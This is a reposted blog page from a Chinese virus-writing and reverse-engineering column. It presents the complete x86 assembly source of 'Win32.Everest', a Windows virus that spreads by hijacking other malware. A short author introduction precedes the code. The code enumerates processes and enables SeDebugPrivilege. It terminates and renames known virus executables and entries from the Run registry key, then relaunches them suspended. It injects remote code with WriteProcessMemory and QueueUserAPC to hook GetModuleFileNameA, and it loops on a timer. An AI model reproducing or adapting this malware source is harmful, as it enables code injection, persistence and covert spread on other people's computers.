以毒传毒思想与Win32.Everest源码

转载于 2007-04-26 17:42:00 发布 · 1k 阅读

标签

#system #null #token #byte #path

病毒汇编和调试逆向技术加脱壳专栏收录该内容

506 篇文章

订阅专栏

本文介绍了一种名为Win32.Everest的独特病毒，该病毒通过感染其他已知病毒来传播自身，并利用注册表启动项进行自我复制。文章详细展示了其技术实现细节，包括如何查找、感染及启动已知病毒。

Win32.Everest
by pkxp/CVC

lemme introduce my Everest virus, the worlds first virus
which spreads via other viruses. The idea came to my head when
I was thinking about viruses in 2003. The virus itself is not
big,and it's not complicated, I code it just to show something new.

Technical details:
1. find a known virus
2. kill and move it
3. run it in suspend mode and hook it's GetModuleNameFileA
4. resume it
5. if no more known viruses ,continue, else jump 1
6. read data from HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run
7. repeat 1,2,3,4,5
8. sleep , then jump 1
So when thonse viruses spread,what they are spreading is my Everest instead!
pkxp / CVC

.386
.model flat,stdcall
option casemap:none
include useful.inc

.code
main:
@pushsz 'Everest'
push FALSE
push NULL
call CreateMutex
call GetLastError
cmp eax , ERROR_ALREADY_EXISTS
jz ExitVirus
call EverestInit

PatchFixedVirus:
mov pMem , NULL
@pushsz '/'
push offset szWinPath
push offset FixedVirus
call PatchAllVirus
push 1000*60*30
call Sleep
PatchRegRunVirus:
Invoke VirtualAlloc,0,4096,MEM_RESERVE or MEM_COMMIT,PAGE_READWRITE
or eax , eax
jz MainSleep
mov pMem , eax

call ReadRunKey ;read data from run to pMem
push NULL
push NULL
push pMem
call PatchAllVirus ;no prefix

push MEM_RELEASE
push 0
push pMem
call VirtualFree
MainSleep:
push 1000*60*15
call Sleep
jmp PatchFixedVirus
ExitVirus:
push 1
call ExitProcess

;--------------------------------------------------------------
EverestInit:
push MAX_PATH
push offset szWormPath
push 0
call GetModuleFileNameA

push 50
push offset szWinPath
call GetWindowsDirectoryA

push 50
push offset szSysPath
call GetSystemDirectoryA
call RaisePrivileges
call GetAPIz
ret

;---------------------------------------------------------------
PatchAllVirus PROC szVirusList : DWORD , szPrefix : DWORD , szPrefix2 : DWORD
LOCAL hProcess : DWORD
LOCAL szVirusPath[128] : BYTE
LOCAL szformatedPath[128]: BYTE

mov esi , szVirusList
lea edi , szVirusPath
PAVLoop:
push esi
push szPrefix2
push szPrefix
@pushsz '%s%s%s'
push edi
call wsprintf
add esp , 20

mov al , byte ptr[edi]
or al , al
jz PAVExit

lea eax , szformatedPath
push eax
push edi
call formatVirus

lea eax , szformatedPath
push eax
call OpenNT4_2k_xp_2003Virus
mov hProcess , eax

PAVNextName:
lodsb
or al , al
jnz PAVNextName
mov eax , pMem
.if eax == 0
lodsd
.else
mov eax , offset PatchVirus
.endif

push edi
push hProcess
call eax

mov al , byte ptr[esi]
or al , al
jnz PAVLoop
PAVExit:
ret 12
PatchAllVirus ENDP

;------------------------------------------------------------------
formatVirus PROC pVirusName:DWORD , pformatedName:DWORD
pushad
mov esi , pVirusName
mov edi , pformatedName
FVCopy:
lodsb
cmp al , ' '
jz FVEndCopy
or al , al
jz FVEndCopy
stosb
jmp FVCopy
FVEndCopy:
xor al , al
stosb
popad
ret 8
formatVirus ENDP

;------------------------------------------------------------------
FixedVirus:
db 'system32/msblast.exe',0 ;msblast
dd offset PatchVirus

db 'Videodrv.exe',0 ;Mimail
dd offset PatchVirus

db 'system32/runouce.exe',0 ;ChineseHack
dd offset PatchVirus

db 'system32/gone.scr',0
dd offset PatchVirus

db 'system32/hfind.exe',0 ;muma
dd offset PatchVirus

db 'system32/scam32.exe',0 ;sircam
dd offset PatchVirus

db 'killonce.exe',0
dd offset PatchVirus

db 'system32/wins/DLLHOST.exe',0
dd offset PatchVirus

db 'system32/Ravmond.exe',0 ;Lovgate
dd offset PatchVirus
db 'system32/WinGate.exe',0
dd offset PatchVirus
db 'system32/WinDriver.exe',0
dd offset PatchVirus
db 'system32/Winrpc.exe',0
dd offset PatchVirus
db 'system32/Winhelp.exe',0
dd offset PatchVirus
db 'system32/Iexplore.exe',0
dd offset PatchVirus
db 'system32/NetServices.exe',0
dd offset PatchVirus
db 'system32/winexe.exe',0
dd offset PatchVirus

db 'mmc.exe',0 ;nimda
dd offset PatchVirus

db 'system32/load.exe',0
dd offset PatchVirus

db 'system32/wqk.exe',0 ;Klez
dd offset PatchVirus
db 'system32/krn132.exe',0
dd offset PatchVirus

db 'ParticularViruses',0
dd offset ParticularVirus
db 0 ;End of virus list

;-------------------------------------------------------------------
OpenNT4_2k_xp_2003Virus PROC szVirusName : DWORD
LOCAL hProcess : DWORD
LOCAL hMods : DWORD
LOCAL szProcessName[MAX_PATH] : BYTE
LOCAL ProcessIds[128+1] : DWORD

pushad
push szVirusName
push offset szWormPath
call lstrcmpi
jz OVFailExit

lea esi , ProcessIds
push (128+1)*4
push esi
call RtlZeroMemory
push offset tmp
push 128*4 ;*4
push esi
moveax,12345678h
_EnumProcesses = dword ptr $-4
call eax ;enumerate all running processes
dec eax
jne OVFailExit
add esi,4 ;esi->ProcessIDs[128]
ProcessSearch:
lodsd ;get PID
or eax , eax
jz OVFailExit

push eax
push FALSE
push PROCESS_ALL_ACCESS
call OpenProcess
or eax , eax
jz ProcessSearch
mov hProcess , eax

lea eax , hMods
push offset tmp
push 4
push eax
push hProcess
mov eax , 12345678h
_EnumProcessModules = dword ptr $-4
call eax
or eax , eax
jz OVClose

lea edi , szProcessName
push MAX_PATH
push edi
push hMods
push hProcess
mov eax , 12345678h
_GetModuleFileNameEx = dword ptr $-4
call eax
or eax , eax
jz OVClose

IsVirus:

push szVirusName
push edi
call lstrcmpi
jz OVSucExit
OVClose:
push hProcess
call CloseHandle
jmp ProcessSearch

OVFailExit:
popad
xor eax , eax
ret 4
OVSucExit:
popad
mov eax , hProcess
ret 4
OpenNT4_2k_xp_2003Virus ENDP

;---------------------------------------------------------------
PatchVirus PROC hProcess : DWORD , szVirusPath : DWORD
LOCAL szDestPath[128] : BYTE
LOCAL szformatedPath[128]: BYTE

pushad
mov eax , hProcess
or eax , eax
jz PVMoveVirus
push 0
push hProcess
call TerminateProcess
push INFINITE
push hProcess
call WaitForSingleObject

push hProcess
call CloseHandle
PVMoveVirus:
lea esi , szformatedPath
push esi
push szVirusPath
call formatVirus

lea edi , szDestPath
push esi
push edi
call lstrcpy

@pushsz '.scr'
push edi
call lstrcat

push edi
push esi
call MoveFile

push esi
call lstrlen

mov esi , szVirusPath
add esi , eax
push esi
push edi
call lstrcat

push edi
call StartVirus
popad
ret 8
PatchVirus ENDP

;-------------------------------------------------------------------
ParticularVirus:
ret 8

;-------------------------------------------------------------------
StartVirus PROC szVirusPath : DWORD
LOCAL sio : STARTUPINFO
LOCAL pi : PROCESS_INformATION
LOCAL cbWritten : DWORD

pushad
push sizeof(STARTUPINFO)
lea eax , sio
push eax
call RtlZeroMemory
mov sio.cb , sizeof STARTUPINFO
mov sio.wShowWindow , SW_HIDE
mov sio.dwFlags , STARTF_USESHOWWINDOW

lea eax , pi
push eax
lea eax , sio
push eax
push NULL
push NULL
push CREATE_SUSPENDED
push TRUE
push NULL
push NULL
push szVirusPath
push NULL
call CreateProcess
or eax , eax
jzSVExit

push 3000
call Sleep

pushPAGE_EXECUTE_READWRITE
pushMEM_RESERVE or MEM_COMMIT
pushRemoteCodeEnd - RemoteCodeStart
push0
push pi.hProcess
call VirtualAllocEx
or eax , eax
jzSVFail
mov esi , eax

add eax , NewGetModuleFileName - RemoteCodeStart
mov _NewGetModuleFileNameA , eax

lea eax , cbWritten
push eax
push RemoteCodeEnd - RemoteCodeStart
push offset RemoteCodeStart
push esi
push pi.hProcess
call WriteProcessMemory
or eax , eax
jzSVFail

push NULL
push pi.hThread
push esi
call QueueUserAPC
or eax , eax
jzSVFail

push pi.hThread
call ResumeThread
SVFail:
push pi.hThread
call CloseHandle
push pi.hProcess
call CloseHandle
SVExit:
popad
ret 4
StartVirus ENDP

;-----------------------------------------------------------------
RemoteCodeStart:
mov esi , 12345678h
_GetModuleFileNameA = dword ptr $-4

@pushsz '123' ;cbWriten
push PAGE_EXECUTE_READWRITE
push 6 ; push & ret
push esi
mov eax , 12345678h
_VirtualProtect = dword ptr $-4
call eax

@pushsz '123' ;cbWriten
push 6
call RCSJump
push 12345678h
_NewGetModuleFileNameA = dword ptr $-4
ret
RCSJump:
push esi
push -1
mov eax , 12345678h
_WriteProcessMemory = dword ptr $-4
call eax
ret 4

NewGetModuleFileName:
push esi
push edi
mov edi , [esp+16]
call _szWormPath
szWormPath db MAX_PATH dup (0)
_szWormPath:
pop esi
xor ecx , ecx
RCSLoop:
lodsb
stosb
inc ecx
or al , al
jnz RCSLoop
pop edi
pop esi
mov eax , ecx
dec eax
ret 12
RemoteCodeEnd:

;-----------------------------------------------------------------
GetAPIz:
@pushsz 'Kernel32.dll'
call GetModuleHandle
xchg eax,esi

@pushsz 'GetModuleFileNameA'
push esi
call GetProcAddress
mov _GetModuleFileNameA,eax

@pushsz 'VirtualProtect'
push esi
call GetProcAddress
mov _VirtualProtect,eax

@pushsz 'WriteProcessMemory'
push esi
call GetProcAddress
mov _WriteProcessMemory,eax

@pushsz 'PSAPI'
call LoadLibraryA
xchg eax,esi

@pushsz 'EnumProcesses'
push esi
call GetProcAddress
mov _EnumProcesses,eax

@pushsz 'EnumProcessModules'
push esi
call GetProcAddress
mov _EnumProcessModules,eax

@pushsz 'GetModuleFileNameExA'
push esi
call GetProcAddress
mov _GetModuleFileNameEx,eax
ret

;---------------Raise Privilege of our process----------------------
RaisePrivileges:
call GetCurrentProcess
push offset p_token
push TOKEN_ALL_ACCESS ;DesiredAccess
push eax
call OpenProcessToken ;open token of our process
or eax,eax ;God,I used cmp eax,eax first
jz RPExit

push offset p_luid
@pushsz 'SeDebugPrivilege'
push NULL
call LookupPrivilegevalueA ;find LUID for this priv.
dec eax
jne RPExit

push 0
call SetLastError
push NULL
push NULL
push NULL
push offset token_priv
push FALSE
push p_token
call AdjustTokenPrivileges
RPExit:
ret
token_priv dd 1
p_luid db 8 dup(0)
dd SE_PRIVILEGE_ENABLED
p_token dd 0

;-------------------------------------------------------------------
ReadRunKey PROC
LOCAL hKey : DWORD
LOCAL dwIndex : DWORD
LOCAL szFilePath[MAX_PATH] : BYTE
LOCAL szvalueName[MAX_PATH] : BYTE
LOCAL dwvalueLen : DWORD
LOCAL dwDataLen : DWORD
LOCAL dwType : DWORD

pushad
lea eax , hKey
push eax
push KEY_QUERY_value ;KEY_ALL_ACCESS
push 0
@pushsz 'Software/Microsoft/Windows/CurrentVersion/Run'
push HKEY_LOCAL_MACHINE
call RegOpenKeyEx
cmp eax , ERROR_SUCCESS
jnz RRKExit

push 0
pop dwIndex
push pMem
pop edi

RRKLoop:
push MAX_PATH
pop dwDataLen
push MAX_PATH
pop dwvalueLen
lea eax , dwDataLen
push eax
lea esi , szFilePath
push esi
lea eax , dwType
push eax
push NULL
lea eax , dwvalueLen
push eax
lea eax , szvalueName
push eax
push dwIndex
push hKey
call RegEnumvalue
cmp eax , ERROR_SUCCESS
jnz RRKClose

push edi
mov edi , esi
push edi
call lstrlen
mov ecx , eax
mov al , '/'
repnz scasb
pop edi
jz RRRKReplace

push esi
@pushsz '/'
push offset szWinPath
@pushsz '%s%s%s'
push edi
call wsprintf
add esp , 20

push edi
call lstrlen
add edi , eax
xor al , al
stosb

push esi
@pushsz '/'
push offset szSysPath
@pushsz '%s%s%s'
push edi
call wsprintf
add esp , 20
jmp RRKNext

RRRKReplace:
push esi
call ReplaceFilePath

push esi
push edi
call lstrcpy
RRKNext:
push edi
call lstrlen
add edi , eax
xor al , al
stosb
inc dwIndex
jmp RRKLoop
RRKClose:

push hKey
call RegCloseKey
RRKExit:
xor al , al
stosb
popad
ret
ReadRunKey ENDP

;------------------------------------------------------------------
ReplaceFilePath PROC szFilePath : DWORD
LOCAL s[MAX_PATH] : BYTE
pushad
push szFilePath
lea edi , s
push edi
call lstrcpy
IsSysDir:
push 8
pop ecx
@pushsz '%system%' ;len=8
pop esi
repz cmpsb
jne IsWinDir

push offset szSysPath
push szFilePath
call lstrcpy
jmp RFPCat
IsWinDir:
push 8
pop ecx
@pushsz '%windir%' ;len=8
pop esi
lea edi , s
repz cmpsb
jne RFPExit

push offset szWinPath
push szFilePath
call lstrcpy
RFPCat:
push edi
push szFilePath
call lstrcat
RFPExit:
popad
ret 4
ReplaceFilePath ENDP

Signature db 'Win32.Everest by PKXP/CVC, made in China.',0
szWinPath db 50 dup (0)
szSysPath db 50 dup (0)
tmp dd ?
pMem dd 0

VEnd:
end main